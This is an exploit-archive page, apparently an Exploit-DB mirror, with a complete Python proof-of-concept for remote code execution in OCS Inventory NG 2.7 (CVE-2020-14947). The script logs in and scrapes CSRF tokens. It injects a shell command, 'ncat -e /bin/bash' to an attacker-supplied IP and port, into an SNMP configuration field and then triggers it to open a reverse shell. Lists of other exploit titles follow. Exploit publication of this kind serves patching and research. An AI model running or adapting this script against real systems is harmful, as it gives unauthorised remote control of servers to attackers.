Menu

Search for hundreds of thousands of exploits

"OCS Inventory NG 2.7 - Remote Code Execution"

Author

Exploit author

Askar

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution
# Date: 2020-06-05
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-14947
# Vendor Homepage: https://ocsinventory-ng.org/
# Version: v2.7
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3


import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')


if len(sys.argv) !=3D 6:
    print("[~] Usage : ./ocsng-exploit.py url username password ip port")
    exit()

url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]

request =3D requests.session()


def login():
    login_info =3D {
    "Valid_CNX": "Send",
    "LOGIN": username,
    "PASSWD": password
    }
    login_request =3D request.post(url+"/index.php", login_info)
    login_text =3D login_request.text
    if "User not registered" in login_text:
        return False
    else:
        return True


def inject_payload():
    csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf")
    content =3D csrf_req.text
    soup =3D BeautifulSoup(content, "lxml")
    first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value")
    print("[+] 1st token : %s" % first_token)
    first_data =3D {
    "CSRF_10": first_token,
    "onglet": "SNMP",
    "old_onglet": "INVENTORY"
    }
    req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir=
st_data)
    content2 =3D req.text
    soup2 =3D BeautifulSoup(content2, "lxml")
    second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"=
)
    print("[+] 2nd token : %s" % second_token)
    payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port)
    #RELOAD_CONF=3D&Valid=3DUpdate
    inject_request =3D {
    "CSRF_14": second_token,
    "onglet": "SNMP",
    "old_onglet": "SNMP",
    "SNMP": "0",
    "SNMP_INVENTORY_DIFF": "1",
    # The payload should be here
    "SNMP_MIB_DIRECTORY": payload,
    "RELOAD_CONF": "",
    "Valid": "Update"
    }
    final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=
=3Dinject_request)
    if "Update done" in final_req.text:
        print("[+] Payload injected successfully")
        execute_payload()


def execute_payload():
    csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config")
    content =3D csrf_req.text
    soup =3D BeautifulSoup(content, "lxml")
    third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value")
    third_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
 files=3D{
    'CSRF_22': (None, third_token),
    'onglet': (None, 'SNMP_MIB'),
    'old_onglet': (None, 'SNMP_RULE'),
    'snmp_config_length': (None, '10')
    })
    print("[+] 3rd token : %s" % third_token)
    third_request_text =3D third_request.text
    soup =3D BeautifulSoup(third_request_text, "lxml")
    forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value")
    print("[+] 4th token : %s" % forth_token)
    print("[+] Triggering payload ..")
    print("[+] Check your nc ;)")
    forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
 files=3D{
    'CSRF_26': (None, forth_token),
    'onglet': (None, 'SNMP_MIB'),
    'old_onglet': (None, 'SNMP_MIB'),
    'update_snmp': (None, 'send')
    })



if login():
    print("[+] Valid credentials!")
    inject_payload()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-07-02 "OCS Inventory NG 2.7 - Remote Code Execution" webapps multiple Askar
2020-04-29 "Open-AudIT Professional 3.3.1 - Remote Code Execution" webapps php Askar
2020-02-24 "Cacti 1.2.8 - Remote Code Execution" webapps php Askar
2020-02-03 "Cacti 1.2.8 - Authenticated Remote Code Execution" webapps multiple Askar
2020-02-03 "Cacti 1.2.8 - Unauthenticated Remote Code Execution" webapps multiple Askar
2020-01-10 "Pandora 7.0NG - Remote Code Execution" webapps php Askar
2019-10-29 "rConfig 3.9.2 - Remote Code Execution" webapps php Askar
2019-09-06 "FusionPBX 4.4.8 - Remote Code Execution" remote linux Askar
2019-07-02 "Centreon 19.04 - Remote Code Execution" webapps php Askar
2019-06-28 "LibreNMS 1.46 - 'addhost' Remote Code Execution" webapps php Askar 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected